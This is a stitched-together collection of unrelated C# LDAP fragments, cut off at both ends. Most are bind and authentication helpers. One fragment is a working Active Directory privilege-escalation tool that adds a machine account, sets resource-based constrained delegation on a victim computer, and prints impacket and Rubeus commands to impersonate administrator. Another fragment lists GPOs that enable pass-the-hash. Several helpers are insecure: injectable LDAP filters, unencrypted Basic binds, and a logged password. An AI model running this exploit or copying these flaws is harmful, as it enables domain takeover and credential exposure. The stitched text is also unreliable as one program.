NativeComInterfaces.IAdsLargeInteger largeIntValue = (NativeComInterfaces.IAdsLargeInteger) PropertyManager.GetPropertyValue(de, "lockoutDuration");
Int64 int64Value = largeIntValue.HighPart * 0x100000000 + (uint) largeIntValue.LowPart;
// int64Value is the negative of the number of 100 nanoseconds interval that makes up the lockout duration
adLockoutDuration = new TimeSpan(-int64Value);
}
}
}
/// <summary>
/// Get the connection instance of the LDAP directory.
/// </summary>
/// <returns>LDAP Connection.</returns>
private LdapConnection GetConnection()
{
var ldapConnection = new LdapConnection(connection.LDAPServer);
ldapConnection.SessionOptions.SecureSocketLayer = false;
ldapConnection.AuthType = AuthType.Basic;
ldapConnection.Bind(new NetworkCredential(connection.UserName, connection.Password));
return ldapConnection;
}
static void Main(string[] args)
{
try
{
AuthType auth = AuthType.Negotiate;
string server = null, searchBase = null, filter = null, user = null, pass = null, domain = null, fileOut = null;
int maxcount = 0;
bool ssl = false;
string[] attrs = null;
// Parse arguments
for (int i = 0; i < args.Length; i++)
{
switch (args[i])
{
case "-s":
case "-h":
server = args[++i];
break;
case "-o":
fileOut = args[++i];
break;
case "-b":
searchBase = args[++i];
break;
case "-f":
case "-r":
filter = args[++i];
break;
case "-l":
attrs = args[++i].Split(',', ' ');
break;
case "-m":
maxcount = int.Parse(args[++i]);
break;
case "-anon":
auth = AuthType.Anonymous;
break;
case "-x":
auth = AuthType.Basic;
break;
case "-a":
auth = (AuthType)Enum.Parse(typeof(AuthType), args[++i]);
break;
case "-D":
case "-u":
user = args[++i];
break;
case "-w":
case "-p":
pass = args[++i];
break;
case "-d":
domain = args[++i];
break;
case "-ssl":
ssl = true;
break;
default:
Console.Error.WriteLine("Unexpected argument: {0}", args[i]);
break;
}
}
if (args.Length == 0
|| args[0].IndexOf('?') > -1
|| string.IsNullOrEmpty(server)
|| string.IsNullOrEmpty(filter))
{
ShowUsage();
return;
}
using (var conn = new LdapConnection(server))
{
conn.SessionOptions.ProtocolVersion = 3;
conn.SessionOptions.SecureSocketLayer = ssl;
conn.AuthType = auth;
if (!string.IsNullOrEmpty(user))
{
conn.Credential = string.IsNullOrEmpty(domain) ? new System.Net.NetworkCredential(user, pass)
: new System.Net.NetworkCredential(user, pass, domain);
}
conn.AutoBind = false;
conn.Bind();
var pager = new PagingHelper()
{
Connection = conn,
Attrs = attrs,
Filter = filter,
DistinguishedName = searchBase,
SizeLimit = maxcount
};
LdifWriter ldif = !string.IsNullOrEmpty(fileOut) ? new LdifWriter(fileOut)
: new LdifWriter(System.Console.Out);
ldif.WriteSummary = false;
using (ldif)
{
foreach (var entry in pager.GetResults())
{
ldif.BeginEntry(entry.DistinguishedName);
foreach (DirectoryAttribute attr in entry.Attributes.Values)
{
if (attr.Count == 0)
{
Console.Error.WriteLine("Attribute {0} contains no values; possible ranged attr", attr.Name);
continue;
}
try
{
foreach (string s in attr.GetValues(typeof(string)))
{
ldif.WriteAttr(attr.Name, s);
}
}
catch
{
foreach (byte[] bytes in attr.GetValues(typeof(byte[])))
{
ldif.WriteAttr(attr.Name, bytes);
}
}
}
ldif.EndEntry();
}
ldif.Close();
}
}
}
catch (Exception e)
{
Console.Error.WriteLine("Error type {0}, message {1}: {2}", e.GetType(), e.Message, e.StackTrace);
System.Environment.ExitCode = 1;
}
}
public static bool check_password_with_ldap(string username, string password)
{
// allow multiple, seperated by a pipe character
string dns = btnet.Util.get_setting(
"LdapUserDistinguishedName",
"uid=$REPLACE_WITH_USERNAME$,ou=people,dc=mycompany,dc=com");
string[] dn_array = dns.Split('|');
string ldap_server = btnet.Util.get_setting(
"LdapServer",
"127.0.0.1");
using (LdapConnection ldap = new LdapConnection(ldap_server))
{
for (int i = 0; i < dn_array.Length; i++)
{
string dn = dn_array[i].Replace("$REPLACE_WITH_USERNAME$", username);
System.Net.NetworkCredential cred = new System.Net.NetworkCredential(dn, password);
ldap.AuthType = (System.DirectoryServices.Protocols.AuthType)System.Enum.Parse
(typeof(System.DirectoryServices.Protocols.AuthType),
Util.get_setting("LdapAuthType", "Basic"));
try
{
ldap.Bind(cred);
btnet.Util.write_to_log("LDAP authentication ok using " + dn + " for username: "******"\n";
exception_msg += e.InnerException.Message;
}
btnet.Util.write_to_log("LDAP authentication failed using " + dn + ": " + exception_msg);
}
}
}
return false;
}
public string createUserLdap(User user)
{
ldapId = new LdapDirectoryIdentifier(HOST, PORT);
network = new NetworkCredential(ADMIN, ADMIN_PASS);
using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic))
{
try
{
string[] objectClass = new string[] { "top", "inetOrgPerson", "organizationalPerson", "person" };
connection.SessionOptions.SecureSocketLayer = false;
connection.SessionOptions.ProtocolVersion = 3;
String dn = DN_CREATE.Replace("{0}", user.email);
DirectoryAttributeCollection collection = new DirectoryAttributeCollection() {
new DirectoryAttribute("objectclass", objectClass),
new DirectoryAttribute("uid",user.email),
new DirectoryAttribute("sn", user.lastName),
new DirectoryAttribute("cn", user.userName),
new DirectoryAttribute("employeeNumber", user.userId),
new DirectoryAttribute("departmentNumber", user.userGroup),
new DirectoryAttribute("userPassword", user.password)
};
AddRequest addMe = new AddRequest(dn, "inetOrgPerson");
addMe.Attributes.AddRange(collection);
connection.Bind();
connection.SendRequest(addMe);
return "OK";
}
catch (LdapException ex)
{
throw new BusinessException("Ldap error: " + ex.Message);
}
catch (Exception e)
{
throw new PlatformException("Ldap error: " + e.Message);
}
}
}
public DirectoryEntry Validate(string username, string password)
{
var config = Config.Get<Settings>();
var directory = new LdapDirectoryIdentifier(
config.Host,
config.Port,
fullyQualifiedDnsHostName: true,
connectionless: false);
var credential = new NetworkCredential(
config.Username,
config.Password);
var ldapConnection = new LdapConnection(directory, credential)
{
AuthType = AuthType.Basic
};
try
{
ldapConnection.SessionOptions.ProtocolVersion = 3;
var request = new SearchRequest(
config.DistinguishedName,
"(&(objectClass=*)(uid=" + username + "))",
SearchScope.Subtree,
new string[] { "uid", "givenName", "sn", "mail" });
var result = (SearchResponse)ldapConnection.SendRequest(request);
if (result.Entries.Count == 0)
return null;
var item = result.Entries[0];
try
{
ldapConnection.Bind(new NetworkCredential(item.DistinguishedName, password));
}
catch (Exception ex)
{
Log.Error("Error authenticating user", ex, this.GetType());
return null;
}
// make sure to check these attribute names match with your LDAP attributes
var uid = item.Attributes["uid"];
var firstName = item.Attributes["givenName"];
var lastName = item.Attributes["sn"];
var email = item.Attributes["mail"];
var entry = new DirectoryEntry
{
Username = uid[0] as string,
FirstName = uid.Count > 0 ? firstName[0] as string : null,
LastName = lastName.Count > 0 ? lastName[0] as string : null,
Email = email.Count > 0 ? email[0] as string : null
};
return entry;
}
finally
{
try
{
ldapConnection.Dispose();
}
catch
{
}
}
}
public static LdapConnection LdapConnectBind(Uri url, string user, string password)
{
// Create connection without SSL and other security
LdapConnection connection = new LdapConnection(url.Host + ":" + url.Port);
if (url.Scheme == "ldap")
{
connection.SessionOptions.SecureSocketLayer = false;
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = false;
}
else if (url.Scheme == "ldaps")
{
connection.SessionOptions.SecureSocketLayer = true;
}
else
{
throw new Exception("Unknown connection type:" + url.Scheme);
}
// Basic bind with user and old password
NetworkCredential credential = new NetworkCredential(user, password);
connection.AuthType = AuthType.Basic;
try
{
connection.Bind(credential);
}
catch (LdapException ex)
{
// Invalid credentials
if (ex.ErrorCode == 49)
{
throw new Exception(String.Format("Invalid credentials: {0}, {1}", user, password));
}
else
{
throw;
}
}
return connection;
}
static void Main(string[] args)
{
string domain = "";
string domainController = "";
string searchScope = "";
string searchBase = "";
bool verbose = false;
var Options = new Options();
if (CommandLineParser.Default.ParseArguments(args, Options))
{
if (Options.help == true)
{
PrintHelp();
return;
}
if (!string.IsNullOrEmpty(Options.domain))
{
domain = Options.domain;
}
if (string.IsNullOrEmpty(Options.searchScope))
{
searchScope = "SubTree";
}
else
{
searchScope = Options.searchScope;
}
if (!string.IsNullOrEmpty(Options.domainController))
{
domainController = Options.domainController;
}
if (Options.verbose)
{
verbose = true;
}
if (!string.IsNullOrEmpty(Options.searchBase))
{
searchBase = Options.searchBase;
}
}
var listEnableLUA = new List <string>();
var listFilterAdministratorToken = new List <string>();
var listLocalAccountTokenFilterPolicy = new List <string>();
var listSeDenyNetworkLogonRight = new List <string>();
var listSeDenyRemoteInteractiveLogonRight = new List <string>();
var computerPolicyEnableLUA = new List <string>();
var computerPolicyFilterAdministratorToken = new List <string>();
var computerPolicyLocalAccountTokenFilterPolicy = new List <string>();
var computerPolicySeDenyNetworkLogonRight = new List <string>();
var computerPolicySeDenyRemoteInteractiveLogonRight = new List <string>();
//discover current domain
System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
if (string.IsNullOrEmpty(domain))
{
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
domain = current_domain.Name;
}
catch
{
Console.WriteLine("[!] Cannot enumerate domain.\n");
return;
}
}
else
{
DirectoryContext domainContext = new DirectoryContext(DirectoryContextType.Domain, domain);
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetDomain(domainContext);
}
catch
{
Console.WriteLine("\n[!] The specified domain does not exist or cannot be contacted. Exiting...\n");
return;
}
}
if (string.IsNullOrEmpty(Options.domainController))
{
domainController = current_domain.FindDomainController().Name;
}
else
{
var ldapId = new LdapDirectoryIdentifier(Options.domainController);
using (var testConnection = new LdapConnection(ldapId))
{
try
{
testConnection.Bind();
}
catch
{
Console.WriteLine("\n[!] The specified domain controller cannot be contacted. Exiting...\n");
return;
}
}
}
domain = domain.ToLower();
String[] DC_array = null;
String distinguished_name = null;
distinguished_name = "CN=Policies,CN=System";
DC_array = domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(domainController, 389);
System.DirectoryServices.Protocols.LdapConnection connection = null;
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
try
{
connection.Bind();
}
catch
{
Console.WriteLine("The domain controller cannot be contacted. Exiting...\n");
return;
}
SearchRequest requestGUID = null;
if (string.Equals(searchScope, "SubTree"))
{
requestGUID = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "cn=*", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
}
else if (string.Equals(searchScope, "OneLevel"))
{
requestGUID = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "cn=*", System.DirectoryServices.Protocols.SearchScope.OneLevel, null);
}
else if (string.Equals(searchScope, "Base"))
{
requestGUID = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "cn=*", System.DirectoryServices.Protocols.SearchScope.Base, null);
}
SearchResponse responseGUID = null;
try
{
responseGUID = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(requestGUID);
}
catch
{
Console.WriteLine("\n[!] Search scope is not valid. Exiting...\n");
return;
}
if (!string.IsNullOrEmpty(Options.searchBase))
{
string adPath = "LDAP://" + domain + searchBase;
if (!DirectoryEntry.Exists(adPath))
{
Console.WriteLine("\n[!] Search base {0} is not valid. Exiting...\n", adPath);
return;
}
}
Console.WriteLine("\n[-] Domain Controller is: {0}\n[-] Domain is: {1}\n", domainController, domain);
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in responseGUID.Entries)
{
try
{
var requestAttributes = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "cn=" + entry.Attributes["cn"][0].ToString(), System.DirectoryServices.Protocols.SearchScope.OneLevel, null);
var responseAttributes = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(requestAttributes);
foreach (System.DirectoryServices.Protocols.SearchResultEntry attribute in responseAttributes.Entries)
{
try
{
string displayName = entry.Attributes["displayName"][0].ToString();
string name = entry.Attributes["name"][0].ToString();
string gpcfilesyspath = entry.Attributes["gpcfilesyspath"][0].ToString();
string uncPathGptTmpl = gpcfilesyspath + @"\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf";
bool enableLUA = CheckEnableLUA(uncPathGptTmpl);
if (enableLUA)
{
if (verbose)
{
Console.WriteLine("[+] The following GPO enables pass-the-hash by disabling EnableLUA: {0} {1}", displayName, name);
}
listEnableLUA.Add(name);
}
bool FilterAdministratorToken = CheckFilterAdministratorToken(uncPathGptTmpl);
if (FilterAdministratorToken)
{
if (verbose)
{
Console.WriteLine("[+] The following GPO exempts the RID 500 account from UAC protection by disabling FilterAdministratorToken: {0} {1}", displayName, name);
}
listFilterAdministratorToken.Add(name);
}
string uncPathRegistryXML = gpcfilesyspath + @"\MACHINE\Preferences\Registry\Registry.xml";
bool LocalAccountTokenFilterPolicy = CheckLocalAccountTokenFilterPolicy(uncPathRegistryXML);
if (LocalAccountTokenFilterPolicy)
{
if (verbose)
{
Console.WriteLine("[+] The following GPO enables pass-the-hash by enabling LocalAccountTokenFilterPolicy: {0} {1}", displayName, name);
}
listLocalAccountTokenFilterPolicy.Add(name);
}
bool SeDenyNetworkLogonRight = CheckSeDenyNetworkLogonRight(uncPathGptTmpl);
if (SeDenyNetworkLogonRight)
{
if (verbose)
{
Console.WriteLine("[+] The following GPO includes the built-in Administrators group within the SeDenyNetworkLogonRight: {0} {1}", displayName, name);
}
listSeDenyNetworkLogonRight.Add(name);
}
bool SeDenyRemoteInteractiveLogonRight = CheckSeDenyRemoteInteractiveLogonRight(uncPathGptTmpl);
if (SeDenyRemoteInteractiveLogonRight)
{
if (verbose)
{
Console.WriteLine("[+] The following GPO includes the built-in Administrators group within the SeDenyRemoteInteractiveLogonRight: {0} {1}\n", displayName, name);
}
listSeDenyRemoteInteractiveLogonRight.Add(name);
}
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the displayname, name and gpcfilesypath...\n");
return;
}
}
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve GPO Policies...\n");
return;
}
}
Console.Write("\n[+] EnableLUA: \t\t\t\t");
foreach (var guid in listEnableLUA)
{
DirectoryEntry startingPoint = null;
string filterGPLink = "(&(objectCategory=organizationalUnit)(gplink=*" + guid + "*))";
if (string.IsNullOrEmpty(searchBase))
{
startingPoint = new DirectoryEntry("LDAP://" + domain);
}
else
{
startingPoint = new DirectoryEntry("LDAP://" + domain + searchBase);
}
DirectorySearcher searcher = new DirectorySearcher(startingPoint);
searcher.Filter = filterGPLink;
foreach (SearchResult OU in searcher.FindAll())
{
DirectoryEntry startingPoint1 = new DirectoryEntry(OU.Path);
DirectorySearcher searcherOU = new DirectorySearcher(startingPoint1);
searcherOU.Filter = "(&(samAccountType=805306369))";
foreach (SearchResult computerObject in searcherOU.FindAll())
{
DirectoryEntry computer = computerObject.GetDirectoryEntry();
if (!(computerPolicyEnableLUA.Contains(computer.Properties["dNSHostName"].Value.ToString())))
{
Console.Write("{0} ", computer.Properties["dNSHostName"].Value.ToString());
}
computerPolicyEnableLUA.Add(computer.Properties["dNSHostName"].Value.ToString());
}
}
}
//Console.Write("\n");
Console.Write("\n[+] FilterAdministratorToken: \t\t");
foreach (var guid in listFilterAdministratorToken)
{
DirectoryEntry startingPoint = null;
string filterGPLink = "(&(objectCategory=organizationalUnit)(gplink=*" + guid + "*))";
if (string.IsNullOrEmpty(searchBase))
{
startingPoint = new DirectoryEntry("LDAP://" + domain);
}
else
{
startingPoint = new DirectoryEntry("LDAP://" + domain + searchBase);
}
DirectorySearcher searcher = new DirectorySearcher(startingPoint);
searcher.Filter = filterGPLink;
foreach (SearchResult OU in searcher.FindAll())
{
DirectoryEntry startingPoint1 = new DirectoryEntry(OU.Path);
DirectorySearcher searcherOU = new DirectorySearcher(startingPoint1);
searcherOU.Filter = "(&(samAccountType=805306369))";
foreach (SearchResult computerObject in searcherOU.FindAll())
{
DirectoryEntry computer = computerObject.GetDirectoryEntry();
if (!(computerPolicyFilterAdministratorToken.Contains(computer.Properties["dNSHostName"].Value.ToString())))
{
Console.Write("{0} ", computer.Properties["dNSHostName"].Value.ToString());
}
computerPolicyFilterAdministratorToken.Add(computer.Properties["dNSHostName"].Value.ToString());
}
}
}
Console.Write("\n");
Console.Write("[+] LocalAccountTokenFilterPolicy: \t");
foreach (var guid in listLocalAccountTokenFilterPolicy)
{
DirectoryEntry startingPoint = null;
string filterGPLink = "(&(objectCategory=organizationalUnit)(gplink=*" + guid + "*))";
if (string.IsNullOrEmpty(searchBase))
{
startingPoint = new DirectoryEntry("LDAP://" + domain);
}
else
{
startingPoint = new DirectoryEntry("LDAP://" + domain + searchBase);
}
DirectorySearcher searcher = new DirectorySearcher(startingPoint);
searcher.Filter = filterGPLink;
foreach (SearchResult OU in searcher.FindAll())
{
DirectoryEntry startingPoint1 = new DirectoryEntry(OU.Path);
DirectorySearcher searcherOU = new DirectorySearcher(startingPoint1);
searcherOU.Filter = "(&(samAccountType=805306369))";
foreach (SearchResult computerObject in searcherOU.FindAll())
{
DirectoryEntry computer = computerObject.GetDirectoryEntry();
if (!(computerPolicyLocalAccountTokenFilterPolicy.Contains(computer.Properties["dNSHostName"].Value.ToString())))
{
Console.Write("{0} ", computer.Properties["dNSHostName"].Value.ToString());
}
computerPolicyLocalAccountTokenFilterPolicy.Add(computer.Properties["dNSHostName"].Value.ToString());
}
}
}
Console.Write("\n");
Console.Write("[+] SeDenyNetworkLogonRight: \t\t");
foreach (var guid in listSeDenyNetworkLogonRight)
{
DirectoryEntry startingPoint = null;
string filterGPLink = "(&(objectCategory=organizationalUnit)(gplink=*" + guid + "*))";
if (string.IsNullOrEmpty(searchBase))
{
startingPoint = new DirectoryEntry("LDAP://" + domain);
}
else
{
startingPoint = new DirectoryEntry("LDAP://" + domain + searchBase);
}
DirectorySearcher searcher = new DirectorySearcher(startingPoint);
searcher.Filter = filterGPLink;
foreach (SearchResult OU in searcher.FindAll())
{
DirectoryEntry startingPoint1 = new DirectoryEntry(OU.Path);
DirectorySearcher searcherOU = new DirectorySearcher(startingPoint1);
searcherOU.Filter = "(&(samAccountType=805306369))";
foreach (SearchResult computerObject in searcherOU.FindAll())
{
DirectoryEntry computer = computerObject.GetDirectoryEntry();
if (!(computerPolicySeDenyNetworkLogonRight.Contains(computer.Properties["dNSHostName"].Value.ToString())))
{
Console.Write("{0} ", computer.Properties["dNSHostName"].Value.ToString());
}
computerPolicySeDenyNetworkLogonRight.Add(computer.Properties["dNSHostName"].Value.ToString());
}
}
}
Console.Write("\n");
Console.Write("[+] SeDenyRemoteInteractiveLogonRight: \t");
foreach (var guid in listSeDenyRemoteInteractiveLogonRight)
{
DirectoryEntry startingPoint = null;
string filterGPLink = "(&(objectCategory=organizationalUnit)(gplink=*" + guid + "*))";
if (string.IsNullOrEmpty(searchBase))
{
startingPoint = new DirectoryEntry("LDAP://" + domain);
}
else
{
startingPoint = new DirectoryEntry("LDAP://" + domain + searchBase);
}
DirectorySearcher searcher = new DirectorySearcher(startingPoint);
searcher.Filter = filterGPLink;
foreach (SearchResult OU in searcher.FindAll())
{
DirectoryEntry startingPoint1 = new DirectoryEntry(OU.Path);
DirectorySearcher searcherOU = new DirectorySearcher(startingPoint1);
searcherOU.Filter = "(&(samAccountType=805306369))";
foreach (SearchResult computerObject in searcherOU.FindAll())
{
DirectoryEntry computer = computerObject.GetDirectoryEntry();
if (!(computerPolicySeDenyRemoteInteractiveLogonRight.Contains(computer.Properties["dNSHostName"].Value.ToString())))
{
Console.Write("{0} ", computer.Properties["dNSHostName"].Value.ToString());
}
computerPolicySeDenyRemoteInteractiveLogonRight.Add(computer.Properties["dNSHostName"].Value.ToString());
}
}
}
Console.Write("\n");
}
/// <summary>
/// Checks if the user is a local directory user.
/// </summary>
/// <param name="username">The username.</param>
/// <returns>[true] if the user is a local directory user.</returns>
/// <remarks>Documented by Dev03, 2008-11-25</remarks>
private bool CheckLocalDirectoryUser(string username)
{
try
{
switch (connector.GetLocalDirectoryType())
{
case LocalDirectoryType.ActiveDirectory:
string domain = username.Substring(0, username.IndexOf(@"\"));
PrincipalContext context;
if (!String.IsNullOrWhiteSpace(connector.GetLdapUser()) && !String.IsNullOrWhiteSpace(domain))
context = new PrincipalContext(ContextType.Domain, domain, connector.GetLdapUser(), connector.GetLdapPassword());
if (!String.IsNullOrWhiteSpace(domain))
context = new PrincipalContext(ContextType.Domain, domain);
else
context = new PrincipalContext(ContextType.Domain);
UserPrincipal user = UserPrincipal.FindByIdentity(context, username);
return user != null;
case LocalDirectoryType.eDirectory:
LdapConnection connection = new LdapConnection(new LdapDirectoryIdentifier(connector.GetLdapServer()));
connection.AuthType = AuthType.Basic;
connection.SessionOptions.SecureSocketLayer = connector.GetLdapUseSSL();
if (connector.GetLdapUser() != null && connector.GetLdapUser().Length > 0)
connection.Bind(new System.Net.NetworkCredential(connector.GetLdapUser(), connector.GetLdapPassword()));
else
connection.Bind();
string searchString = String.Format("(&(|(cn={0})(uid={0}))(|(objectClass=user)(objectClass=person)))",
username.Substring(username.LastIndexOf("\\") + 1));
SearchResponse response = connection.SendRequest(new SearchRequest(connector.GetLdapContext(),
searchString, SearchScope.Subtree, null)) as SearchResponse;
if (response.Entries.Count > 0)
return true;
break;
}
}
catch { return false; }
return true;
}
private void lockedLdapBind(LdapConnection current, NetworkCredential creds, ContextOptions contextOptions)
{
current.AuthType = ((ContextOptions.SimpleBind & contextOptions) > 0 ? AuthType.Basic : AuthType.Negotiate);
current.SessionOptions.Signing = ((ContextOptions.Signing & contextOptions) > 0 ? true : false);
current.SessionOptions.Sealing = ((ContextOptions.Sealing & contextOptions) > 0 ? true : false);
if ((null == creds.UserName) && (null == creds.Password))
{
current.Bind();
}
else
{
current.Bind(creds);
}
}
static void Main(string[] args)
{
if (args.Length < 2)
{
Usage();
return;
}
var arguments = new Dictionary <string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
}
if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
{
Usage();
return;
}
String DomainController = arguments["dc"];
String Domain = arguments["domain"];
String new_MachineAccount = "";
String new_MachineAccount_password = "";
//添加的机器账户
if (arguments.ContainsKey("ma"))
{
new_MachineAccount = arguments["ma"];
}
else
{
new_MachineAccount = RandomString(8);
}
//机器账户密码
if (arguments.ContainsKey("ma"))
{
new_MachineAccount_password = arguments["mp"];
}
else
{
new_MachineAccount_password = RandomString(10);
}
String victimcomputer = arguments["tm"];; //需要进行提权的机器
String machine_account = new_MachineAccount;
String sam_account = "";
String DistinguishedName = "";
if (machine_account.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = DistinguishedName;
String victim_distinguished_name = DistinguishedName;
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
Console.WriteLine(victim_distinguished_name);
Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
try{
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
//通过ldap找计算机
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
myldapConnection.Path = "LDAP://" + victim_distinguished_name;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
search.Filter = "(CN=" + victimcomputer + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
return;
}
//添加机器并设置资源约束委派
if (result != null)
{
try
{
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(buffer, 0);
//测试sddl转换结果
//RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
//Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
try
{
var change_request = new System.DirectoryServices.Protocols.ModifyRequest();
change_request.DistinguishedName = victim_distinguished_name;
DirectoryAttributeModification modifymsDS = new DirectoryAttributeModification();
modifymsDS.Operation = DirectoryAttributeOperation.Replace;
modifymsDS.Name = "msDS-AllowedToActOnBehalfOfOtherIdentity";
modifymsDS.Add(buffer);
change_request.Modifications.Add(modifymsDS);
connection.SendRequest(change_request);
Console.WriteLine("[+] Exploit successfully!\n");
//打印利用方式
Console.WriteLine("[+] Use impacket to get priv!\n");
Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
Console.WriteLine("\n\n[+] Use Rubeus.exe to get priv!\n");
Console.WriteLine("\nRubeus.exe hash /user:{0} /password:{1} /domain:{2}", machine_account, new_MachineAccount_password, Domain);
Console.WriteLine("\nRubeus.exe s4u /user:{0} /rc4:rc4_hmac /impersonateuser:administrator /msdsspn:cifs/{1}.{2} /ptt /dc:{3}", machine_account, victimcomputer, Domain, DomainController);
Console.WriteLine("\npsexec.exe \\\\{0}.{1} cmd ", victimcomputer, Domain);
Console.WriteLine("\n[+] Done..");
}
catch (System.Exception ex)
{
Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
Console.WriteLine("[!] Failed...");
return;
}
}
}
catch (System.Exception ex) {
Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
return;
}
}
//private string _path;
//private string _filterAttribute;
//private ILog log;
//public LdapAuthentication(string path)
//{
// _path = path;
// log = LogManager.GetLogger(this.GetType());
//}
public static bool IsAuthenticated(string username, string pwd)
{
//string domainAndUsername = (String.IsNullOrEmpty(domain) ? "" : @"\") + username;
try
{
var credential = new NetworkCredential("cn=Directory Manager", "");
var entry = new LdapConnection("10.243.1.123")
{
AuthType = AuthType.Basic,
Credential = credential
};
entry.SessionOptions.ProtocolVersion = 3;
entry.Bind();
var searchRequest = new SearchRequest("dc=gmcc,dc=net", "uid=" + username, SearchScope.Subtree);
var a = (SearchResponse)entry.SendRequest(searchRequest, new TimeSpan(0, 0, 0, 30));
if (a.Entries.Count == 0)
return false;
try
{
var newC = new NetworkCredential(a.Entries[0].DistinguishedName, pwd);
entry.Credential = newC;
entry.Bind();
}
catch
{
return false;
}
return true;
}
catch (Exception ex)
{
throw new Exception("Error authenticating user. " + ex.Message);
}
}
public User authenticateBoundary(string email, string password)
{
ldapId = new LdapDirectoryIdentifier(HOST, PORT);
network = new NetworkCredential(DN.Replace("{0}", email), password);
